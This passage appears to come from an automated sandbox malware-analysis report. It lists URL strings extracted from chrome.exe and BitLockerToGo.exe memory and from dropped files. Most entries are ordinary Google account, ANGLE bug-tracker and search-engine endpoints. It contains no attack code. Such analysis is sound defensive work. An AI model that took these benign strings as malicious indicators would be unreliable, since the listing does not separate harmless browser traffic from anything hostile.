              Source: chrome.exe, 00000005.00000002.2174830805.00006D8C002F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103456738.00006D8C00FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103353447.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104206449.00006D8C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101845896.00006D8C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101763255.00006D8C01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104135844.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101890674.00006D8C00F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101814452.00006D8C01074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103171584.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101961003.00006D8C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103123799.00006D8C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chrome.exe, 00000005.00000002.2174830805.00006D8C002F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103456738.00006D8C00FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103353447.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104206449.00006D8C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101845896.00006D8C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101763255.00006D8C01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104135844.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101890674.00006D8C00F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101814452.00006D8C01074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103171584.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101961003.00006D8C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103123799.00006D8C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chrome.exe, 00000005.00000002.2174830805.00006D8C002F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103456738.00006D8C00FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103353447.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104206449.00006D8C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101845896.00006D8C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101763255.00006D8C01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104135844.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101890674.00006D8C00F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101814452.00006D8C01074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103171584.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101961003.00006D8C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103123799.00006D8C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chrome.exe, 00000005.00000002.2174830805.00006D8C002F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103456738.00006D8C00FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103353447.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104206449.00006D8C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101845896.00006D8C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101763255.00006D8C01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104135844.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101890674.00006D8C00F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101814452.00006D8C01074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103171584.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101961003.00006D8C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103123799.00006D8C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chrome.exe, 00000005.00000002.2181603848.00006D8C00EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
              Source: chrome.exe, 00000005.00000002.2178037293.00006D8C0094C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
              Source: chrome.exe, 00000005.00000002.2178037293.00006D8C0094C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certsm
              Source: chrome.exe, 00000005.00000002.2178883006.00006D8C009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
              Source: chrome.exe, 00000005.00000002.2178883006.00006D8C009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/a
              Source: chromecache_70.7.drString found in binary or memory: http://www.broofa.com
              Source: chrome.exe, 00000005.00000002.2179106232.00006D8C00A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
              Source: BitLockerToGo.exe, 00000004.00000003.2194159423.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2691298161.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176912781.00006D8C0080C000.00000004.00000800.00020000.00000000.sdmp, a16ph4.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
              Source: chrome.exe, 00000005.00000002.2174113799.00006D8C000C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
              Source: chrome.exe, 00000005.00000003.2100474735.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097993942.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180354436.00006D8C00CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2096927533.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099127115.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175203811.00006D8C00454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
              Source: chrome.exe, 00000005.00000002.2180354436.00006D8C00CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2173830012.00006D8C0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
              Source: chrome.exe, 00000005.00000003.2100474735.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097993942.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2096927533.00006D8C00454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099127115.00006D8C00454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout1
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
              Source: chrome.exe, 00000005.00000002.2173972325.00006D8C00060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
              Source: chrome.exe, 00000005.00000002.2173972325.00006D8C00060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
              Source: chrome.exe, 00000005.00000002.2173972325.00006D8C00060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
              Source: chrome.exe, 00000005.00000002.2174113799.00006D8C000C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
              Source: chrome.exe, 00000005.00000002.2180354436.00006D8C00CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/m
              Source: chromecache_75.7.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
              Source: chromecache_75.7.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176048173.00006D8C006E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175324093.00006D8C004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
              Source: chrome.exe, 00000005.00000003.2097177507.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097144150.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
              Source: chrome.exe, 00000005.00000003.2120573504.00006D8C01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121620779.00006D8C01430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116538462.00006D8C01414000.00000004.00000800.00020000.00000000.sdmp, chromecache_75.7.dr, chromecache_70.7.drString found in binary or memory: https://apis.google.com
              Source: chrome.exe, 00000005.00000002.2175865435.00006D8C00660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176210540.00006D8C00730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp, aaaieu.4.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmp, aaaieu.4.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: chrome.exe, 00000005.00000002.2175469937.00006D8C00528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176565290.00006D8C00788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2182243592.00006D8C010DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
              Source: chrome.exe, 00000005.00000002.2180026316.00006D8C00C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
              Source: BitLockerToGo.exe, 00000004.00000003.2194159423.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2691298161.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, a16ph4.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: chrome.exe, 00000005.00000002.2180202104.00006D8C00C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
              Source: chrome.exe, 00000005.00000002.2180202104.00006D8C00C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
              Source: BitLockerToGo.exe, 00000004.00000003.2194159423.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2691298161.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, a16ph4.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: chrome.exe, 00000005.00000002.2179725766.00006D8C00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
              Source: chrome.exe, 00000005.00000002.2179725766.00006D8C00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
              Source: chrome.exe, 00000005.00000002.2179725766.00006D8C00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
              Source: chrome.exe, 00000005.00000002.2178037293.00006D8C0094C000.00000004.00000800.00020000.00000000.sdmp, a16ph4.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chrome.exe, 00000005.00000003.2098861035.00006D8C00D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
              Source: chrome.exe, 00000005.00000002.2175835689.00006D8C00644000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
              Source: chrome.exe, 00000005.00000002.2179048738.00006D8C00A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2182333616.00006D8C01124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2178883006.00006D8C009F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2182509629.00006D8C0129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: chrome.exe, 00000005.00000002.2182509629.00006D8C0129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
              Source: chrome.exe, 00000005.00000003.2097760965.00006D8C00D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2099536314.00006D8C00D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103575904.00006D8C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103608597.00006D8C00D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097724823.00006D8C00D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2097662026.00006D8C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098806802.00006D8C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104170267.00006D8C00D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2098861035.00006D8C00D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
              Source: chrome.exe, 00000005.00000002.2172394351.000005D00078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
              Source: chrome.exe, 00000005.00000003.2082351256.000005D000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2123840009.000005D00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
              Source: chrome.exe, 00000005.00000002.2172394351.000005D00078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
              Source: chrome.exe, 00000005.00000003.2082351256.000005D000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2123840009.000005D00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
              Source: chrome.exe, 00000005.00000002.2172394351.000005D00078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
              Source: chrome.exe, 00000005.00000002.2172394351.000005D00078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2124824779.00006D8C015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2082755676.000005D000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
              Source: chrome.exe, 00000005.00000003.2082351256.000005D000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2123840009.000005D00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
